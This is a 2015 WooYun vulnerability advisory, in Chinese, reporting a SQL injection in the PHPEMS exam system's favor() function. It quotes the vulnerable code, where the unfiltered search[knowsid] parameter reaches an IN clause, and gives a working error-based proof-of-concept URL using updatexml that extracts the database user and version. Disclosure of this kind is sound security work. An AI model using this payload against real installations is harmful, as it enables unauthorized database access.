漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0100989
漏洞标题:PHPEMS一处SQL注入漏洞
相关厂商:PHPEMS
漏洞作者: 路人甲
提交时间:2015-03-12 18:45
修复时间:2015-04-30 18:48
公开时间:2015-04-30 18:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
PHPEMS一处SQL注入漏洞
详细说明:
5.phpems某处SQL注入漏洞
存在注入漏洞代码位于/app/exam/app.php的函数favor()中
具体在
default:
$page = $this->ev->get('page');
$type = $this->ev->get('type');
$search = $this->ev->get('search');
$tmp = $this->section->getKnowsListByArgs(array("knowssectionid = '{$search['sectionid']}'","knowsstatus = 1"));
if($search['sectionid'] && !$search['knowsid'])
{
$search['knowsid'] = '';
if(is_array($tmp))
{
foreach($tmp as $p)
$search['knowsid'] .= $p['knowsid'].",";
}
}
$search['knowsid'] = trim($search['knowsid']," ,");
$page = $page > 0?$page:1;
$args = array("favorsubjectid = '{$this->data['currentbasic']['basicsubjectid']}'","favoruserid = '{$this->_user['sessionuserid']}'");
if($search['knowsid'])$args[] = "quest2knows.qkknowsid IN ({$search['knowsid']})";// SQL注入漏洞
if($type)
{
if($search['questype'])$args[] = "questionrows.qrtype = '{$search['questype']}'";
$favors = $this->favor->getFavorListByUserid($page,20,$args,1);
}
这几行上
if($search['knowsid'])$args[] = "quest2knows.qkknowsid IN ({$search['knowsid']})";
这里的$search['knowsid']可以由URL参数中进行控制$search = $this->ev->get('search');带入组合SQL语句的时候并没有过滤,导致的SQL注入发生
验证
注册用户,登录之
然后访问链接
localhost/ems/index.php?exam-app-favor&search[knowsid]=1,updatexml(1,concat(user(),version()),1)
验证无误
漏洞证明:
注册用户,登录之
然后访问链接
localhost/ems/index.php?exam-app-favor&search[knowsid]=1,updatexml(1,concat(user(),version()),1)
验证无误
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝